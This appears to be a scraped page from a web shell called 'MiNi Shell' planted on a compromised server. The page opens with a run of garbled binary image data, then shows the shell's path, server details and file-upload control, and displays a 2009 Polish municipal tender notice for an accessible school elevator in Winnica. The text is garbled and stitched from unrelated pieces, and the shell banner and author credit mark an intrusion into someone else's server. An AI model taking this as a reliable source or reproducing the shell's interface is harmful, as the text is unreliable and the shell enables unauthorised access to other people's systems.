JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090904/148377-N-2009.html

<p class="kh_header"><b>Winnica: Dostawa i montaż windy osobowej dostosowanej do potrzeb osób niepełnosprawnych w Publicznej Szkole Podstawowej w Winnicy</b><br>
<b>Numer ogłoszenia: 148377 - 2009; data zamieszczenia: 04.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Winnica , ul. Pułtuska 25, 06-120 Winnica, woj. mazowieckie, tel. 023 6914092, faks 023 6914025.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminawinnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż windy osobowej dostosowanej do potrzeb osób niepełnosprawnych w Publicznej Szkole Podstawowej w Winnicy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę i montaz windy osobowej (dźwigu) przystosowanej dla osób niepełnosprawnych o napędzie hydraulicznym, w istniejącym szybie w budynku Publicznej Szkoły Podstawowej w Winnicy. Wykonawca zabezpieczy miejsce pracy w sposób nie kolidujący z pracą szkoły i zapewniający całkowite bezpieczeństwo uczniom. Wykonawca w ramach zamówienia oraz podanej ceny ofertowej przyjmie do wykonania:
1. wykonanie dokumentacji projektowo montażowej,
2. przygotowanie szybu windowego poprzez:
-wybicie tyczasowo zamurowanych otworów drzwiowych
- wymurowanie tylnej ściany szybu na parterze
- uzupełnienie brakujacych tynków
3. dostawę windy wraz z oprzyrzadowaniem na miejsce montażu,
4. montaż,
5. podłączenie do istniejącej instalacji elektrycznej,
6. sporządzenie dokumentacji do rejestracji w Urzędzie Dozoru Technicznego i zatwierdzenie
7. dopuszczenie do eksploatacji,
8. wykonanie prób, odbioru i rozruchu urządzenia dźwigowego z udziałem wymaganych instytucji, w tym UrzeduDozoru technicznego i Zamawiającego
9. rejestrację windy w urzedzie Dozoru Technicznego
10. dostarczenie dokumentacji technicznej dźwigu (DTR ) z instrukcją obsługi i eksploatacji dźwigu, 
11 przeszkolenie pracowników Zamawiającego w zakresie obsługi i eksploatacji dźwigu.
Dane dotyczace windy osobowej (dźwigu ) przystosowanej dla osób niepełnosprawnych:
1)Winda musi posiadać wymiary pozwalające na zamontowanie jej w szybieo wymiarach 1900x2200mm 
2) Winda musi spełniać następujące parametry techniczne:
a)typ dźwigu- osobowy przystosowany dla osób niepełnosprawnych    na wózkach inwalidzkich,
b)Udźwig min.400 kg i min.4 osoby
c)napęd hydrauliczny, zapewniający łagodne starty i zatrzymania, łagodną jazdę kabiny,
c) kabina:
- nieprzelotowa,
- wykonana ze stali nierdzewnej,
- adaptowana pod potrzeby wygodnego użytkowania przez osoby niepełnosprawne, 
- podłoga- wykładzina antypoślizgowa,
- panel dyspozycji z przyciskami w wykonaniu (antywandalowym)
- kolorystyka do wyboru przez klienta.
d) Drzwi kabinowe automatyczne, 
e) Drzwi szybowe automatyczne ze stali nierdzewnej,
f) Wymiary szybu 1800mmx1850mm,
g) Ilość przystanków -2,
h) Ilość dojść -2
i) Wysokość podnoszenia:, parter- ok. 3400mm, I piętro ok. 3300mm 
3)Dokumentacja oraz wszystkie instrukcje muszą być napisane w języku polskim,
4)Koszty związane z odbiorem, rejestracją oraz dopuszczeniem dźwigu do eksploatacji przez Urząd Dozoru Technicznego ponosi Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 42.41.61.00-6, 45.31.31.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 13.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się dostawcy, którzy:
1)posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, 
 2)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
5)złożą formularz ofertowy wraz z wymaganymi dokumentami, oświadczeniami, załącznikami oraz zaświadczeniami,
6)spełniają wymagania określone ustawą Prawo zamówień publicznych oraz niniejszą specyfikacją.
7)oferują dostawę i montaż objęte zamówieniem spełniające wymagania określone przez Zamawiającego.
Z postępowania o udzielenie zamówienia wyklucza się wykonawców wymienionych w  art. 24 ust. 1 i 2 Pzp oraz art.154 pkt.5a Pzp. Sposób dokonania oceny spełnienia wymaganych warunków:
1) przy dokonaniu oceny spełnienia warunków Zamawiający będzie się kierował regułą: spełnia albo nie spełnia,
2) niespełnienie chociażby jednego warunku skutkować będzie wykluczeniem dostawcy z postępowania,
3) ofertę dostawcy wykluczonego uznaje się za odrzuconą.  
Niezwłocznie po wyborze najkorzystniejszej oferty zamawiający zawiadomi dostawców, którzy złożyli oferty, o:
- wyborze najkorzystniejszej oferty, podając nazwę (firmę), siedzibę i adres dostawcy, którego ofertę wybrano oraz uzasadnienie jej wyboru, a także nazwy (firmy), siedziby i adresy dostawców, którzy złożyli oferty wraz ze streszczeniem oceny i porównania złożonych ofert zawierającym punktację przyznaną ofertom w każdym kryterium oceny ofert i łączną punktację,
-  wykonawcach, których oferty zostały odrzucone, podając uzasadnienie faktyczne i prawne,
-  wykonawcach, którzy zostali wykluczeni z postępowania o udzielenie zamówienia, podając uzasadnienie faktyczne i prawne.
Informacja o wyborze najkorzystniejszej oferty, z podaniem nazwy (firmy), siedziby i adresu dostawcy, którego ofertę wybrano oraz uzasadnienie jej wyboru, a także nazwy (firmy), siedziby i adresy dostawców, którzy złożyli oferty wraz ze streszczeniem oceny i porównania złożonych ofert zawierającym punktację przyznaną ofertom zostaną zamieszczone również na stronie internetowej oraz w miejscu publicznie dostępnym w siedzibie zamawiającego..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki:
1) Wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1, 
2) Oświadczenie o spełnieniu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i art. 24 ust. 1 i 2 Prawa zamówień publicznych z wykorzystaniem wzoru - załącznik nr 2
3) Oświadczenie o wizytacji miejsca realizacji zamówienia (wg załącznika nr 3 do SIWZ)
4) Oświadczenie , że Wykonawca w okresie gwarancji zapewnia bezpłatne wykonanie napraw gwarancyjnych urządzenia dźwigowego w maksymalnym czasie 24 godzin od chwili zgłoszenia telefonicznego awarii przez zamawiającego
5) Wykaz części zamówienia, której wykonanie zostanie powierzone Podwykonawcom - jeżeli Wykonawca zamierza powierzyć wykonanie zamówienia Podwykonawcom (wg załącznika nr 5 do SIWZ)
6) Wzór umowy - zaakceptowany i podpisany przez Wykonawcę (wg załącznika nr 6)
7) Dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu określone w pkt. 7.2.
8) Karty katalogowe z parametrami techniczno - użytkowymi  producenta oferowanej windy osobowej (dźwigu) przystosowanej dla osób niepełnosprawnych.

W celu potwierdzenia, że dostawca posiada uprawnienie do wykonywania czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu, do oferty należy dołączyć następujące dokumenty:
- aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
- aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające , że wykonawca nie zalega z opłacaniem  podatków oraz opłat
- aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, lub zaświadczenia , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- wykaz wykonanych dostaw w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 dostawy wraz z montażem wind (dźwigów) osobowych przystosowanych dla osób niepełnosprawnych odpowiadające swoją wartością dostawom stanowiącym przedmiot zamówienia oraz wykażą, ze zostały one wykonane należycie ( Załącznik nr 4 do SIWZ)
Postanowienia dotyczące składanych dokumentów:
1)Ofertę należy sporządzić w języku polskim
2)Oferta powinna zawierać wszystkie wymagane dokumenty, oświadczenia i załączniki, o których mowa w specyfikacji zamawiającego.
3)Oferta oraz wszystkie wymagane załączniki winny być podpisane przez upoważnionego przedstawiciela, uprawnionego do reprezentowania zgodnie z przedstawionym aktem rejestracyjnym, wymogami ustawowymi oraz przepisami prawa. 
4)Jeżeli oferta i załączniki zostaną podpisane przez upoważnionego przedstawiciela, jest on zobowiązany do przedłożenia dokumentu potwierdzającego uprawnienia składającego ofertę.
5)Wykonawców obowiązuje wykorzystanie załączonych wzorów dokumentów - załączników. Wszystkie pola i pozycje tych wzorów winny być wypełnione, a w szczególności muszą zawierać wszystkie wymagane informacje i dane oraz odpowiedzi na wszystkie pytania. Nie dopuszcza się składania alternatywnych co do treści dokumentów. 
6)Wymienione dokumenty mogą być złożone w formie oryginałów lub kopii poświadczonej za zgodność z oryginałem przez osobę (osoby uprawnione do podpisania oferty, z dopiskiem za zgodność z oryginałem). 
7)Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu gdy złożona przez wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
8)Niedostarczenie któregokolwiek z wymaganych w niniejszej specyfikacji dokumentów spowoduje wykluczenie Wykonawcy lub odrzucenie oferty, z zastrzeżeniem art. 26 ust 3 Prawa zamówień publicznych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminawinnca.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Winnica
ul. Pułtuska 25
06-120 Winnica.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2009 godzina 10:00, miejsce: Urząd Gminy Winnica
ul. Pułtuska 25
06-120 Winnica.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com